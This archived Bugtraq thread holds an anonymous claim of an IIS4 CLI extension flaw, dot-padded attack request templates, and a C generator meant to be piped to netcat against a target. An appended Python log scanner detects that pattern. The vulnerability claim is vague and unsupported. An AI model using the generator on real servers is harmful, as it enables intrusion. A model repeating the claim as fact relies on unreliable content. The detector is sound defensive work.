Bugtraq mailing list archives

Re: Shinex vs. IIS CLI Extensions


From: secure () MICROSOFT COM (Microsoft Security Response Center)
Date: Thu, 8 Jun 2000 20:17:15 -0700


-----BEGIN PGP SIGNED MESSAGE-----

We'd be very interested in investigating this report, but unfortunately we can't contact the author because of the anonymous remailer. If the author would contact us at secure () microsoft com, we'd very much like to get some additional information. Regards,

Secure () microsoft com

-----Original Message-----
From: dev-null () NO-ID COM [mailto:dev-null () NO-ID COM]
Sent: Monday, June 05, 2000 5:32 AM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Shinex vs. IIS CLI Extensions

[ This message has been sent anonymously due to configuration problems I'm experiencing with my mail server. If you would like to discuss the fine points of this post, you're quite welcome to message me on Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an
`object collision` vulnerability that can potentially lead to remote
compromise.

The flaw lies in the mechanism employed by CLI objects to handle
dynamic pre-auth requests from a stateful client. States of operation
are inherent in the implementation itself. This flaw could lead to a
determined attacker gaining administrative privileges on servers
using this widely deployed object kit.

EXPLOITATION NOTES
------------------

Request #1:
http://www.victim.com/.....~518 chars.../[invocation of CLI object]

Request #2:
http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

Simple as that.

It's important that both requests reach the target server within a timeframe of 15 seconds (a rough estimate). Your threshold may vary. Subsequent requests will be made with raised authorization levels. The rationale for the char padding will be available later in the follow-up post (see below).

Microsoft has been notified and patching information should be forthcoming. While not as severe as the RDS vulnerability, it is still an avenue of attack that could provide a determined attacker with unauthorized access.

(Allow me to mention in passing that the scarcity of detail in this paper is intentional. A more thorough assessment will be posted after Microsoft have released their hotfix.)

HELPER CODE
-----------
/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
** OK. This code is buggy, because I mistakenly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2)
    {
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    /* snprintf so that a long object name cannot overrun req1/req2 */
    snprintf(req1, sizeof(req1), "GET /%s/%s", gendots(DOT1), argv[1]);
    snprintf(req2, sizeof(req2), "GET /%s/%s", gendots(DOT2), calc(argv[1]));

    /* output is deliberately disabled unless this macro is defined at compile time */
#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif
    return 0;

}

char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;

    /* clamp so the static buffer can never be overrun */
    if(num > (int)sizeof(dots) - 1)
        num = sizeof(dots) - 1;

    for(i = 0; i < num; i++)
        *ptr++ = '.';

    /* terminate here: the buffer is reused between calls, so a second,
    ** shorter run would otherwise still read as the longer first run */
    *ptr = '\0';

    return dots;
}

char *calc(char *arg)
{
    static char file[1024];
    char *ptr;
    /* strip the extension in place (modifies argv[1]); originally had
    ** no error checks, so an argument without a dot would crash here */
    ptr = strrchr(arg, '.');
    if(ptr != NULL)
        *ptr = '\0';
    snprintf(file, sizeof(file), "%s.%s", RANDFILE, arg);
    return file;
}

SHOUTOUTS
---------
Greets to route and my other friends.

--
This message has been sent via an anonymous mail relay at www.no-id.com.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOUBhxo0ZSRQxA/UrAQGUEwgArWqKiGuSBSKz71ui5jFmRAf0nPRm6ez6
Ly1wVNRQLIuknJmz7eS5I6mQ7+UTgaMpT90fHRN6heU7T45xdsNAHwrJ9btNPEpW
luW3q0fHMGaTEXAEm6pAvX5ORV7pWgvRV6NHBPFv5MTLNwd9xbC4mhJXpp7sdpkO
h3XDNSuOcRmHTCcBL1Ikq8R/MgogKe/+AdTGTolAr9uvwTRTEa4SMolp98jUh813
jd54uiWU7M1tu5Wi3gsiDnIske+TzijLoyx4n8G0o01BKieiOvrYbQVvUb92DTPu
EvetLz1Gavj41M9fCP2zmdUSJInRtPXhgF4DMaiL5h1Bu0zg/T8KRg==
=QG1C
-----END PGP SIGNATURE-----
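The pattern the post describes (two requests whose paths are padded with roughly 518 and 260 dot characters, arriving from one client within about 15 seconds) is unusual enough to be worth looking for in web server logs regardless of whether the claimed flaw exists. The following Python script is an added example and is not part of the original post or of Microsoft's reply: it scans constructed IIS W3C-style log lines for request paths containing a long run of dots and pairs two such hits from the same client inside the post's 15-second window. The 518/260-character paddings and the 15 s threshold are the values given in the post; the log field order, the minimum dot-run length, the client IPs and the file names are assumptions made for the example.

```python
"""Flag pairs of dot-padded requests from one client within a short window.

Added example, not code from the original post. Log lines are constructed.
Assumed W3C extended field order: date time c-ip cs-method cs-uri-stem sc-status
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# From the post: ~518 and ~260 dots, both requests within ~15 seconds.
WINDOW = timedelta(seconds=15)
# Assumption: a lower bound that catches both paddings but ignores normal paths.
MIN_DOT_RUN = 200
DOT_RUN = re.compile(r"\.{%d,}" % MIN_DOT_RUN)

# Constructed sample log: client 10.0.0.7 sends both padded requests 9 s apart;
# client 10.0.0.9 sends only one padded request.
SAMPLE_LOG = "\n".join([
    "2000-06-05 10:31:40 10.0.0.7 GET /default.asp 200",
    "2000-06-05 10:31:52 10.0.0.7 GET /" + "." * 518 + "/cliobj.dll 404",
    "2000-06-05 10:32:01 10.0.0.7 GET /" + "." * 260 + "/AABBCC.cliobj 404",
    "2000-06-05 10:32:30 10.0.0.9 GET /" + "." * 300 + "/x.dll 404",
    "2000-06-05 10:33:10 10.0.0.9 GET /index.htm 200",
])


def parse_line(line):
    """Return (timestamp, client_ip, uri_stem) or None for comments/bad lines."""
    fields = line.split()
    if len(fields) != 6 or fields[0].startswith("#"):
        return None
    date, time, ip, _method, uri, _status = fields
    ts = datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S")
    return ts, ip, uri


def padded_requests(log_text):
    """Return (ts, ip, uri, run_length) for every line whose path has a long dot run."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, uri = parsed
        match = DOT_RUN.search(uri)
        if match:
            hits.append((ts, ip, uri, len(match.group(0))))
    return hits


def find_pairs(log_text, window=WINDOW):
    """Return (ip, t1, t2, run1, run2) for consecutive padded requests from
    the same client that arrive no more than `window` apart."""
    by_ip = defaultdict(list)
    for ts, ip, _uri, run in padded_requests(log_text):
        by_ip[ip].append((ts, run))
    alerts = []
    for ip, hits in by_ip.items():
        hits.sort()
        for (t1, run1), (t2, run2) in zip(hits, hits[1:]):
            if t2 - t1 <= window:
                alerts.append((ip, t1, t2, run1, run2))
    return alerts


if __name__ == "__main__":
    for ip, t1, t2, run1, run2 in find_pairs(SAMPLE_LOG):
        print("%s: padded requests (%d and %d dots) at %s and %s"
              % (ip, run1, run2, t1.time(), t2.time()))
```

On the constructed sample the script reports one alert, for 10.0.0.7; the single 300-dot request from 10.0.0.9 is recorded as a hit but never paired. A real deployment would feed the actual IIS log file line by line and would tune MIN_DOT_RUN to the longest legitimate path component seen on the server.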
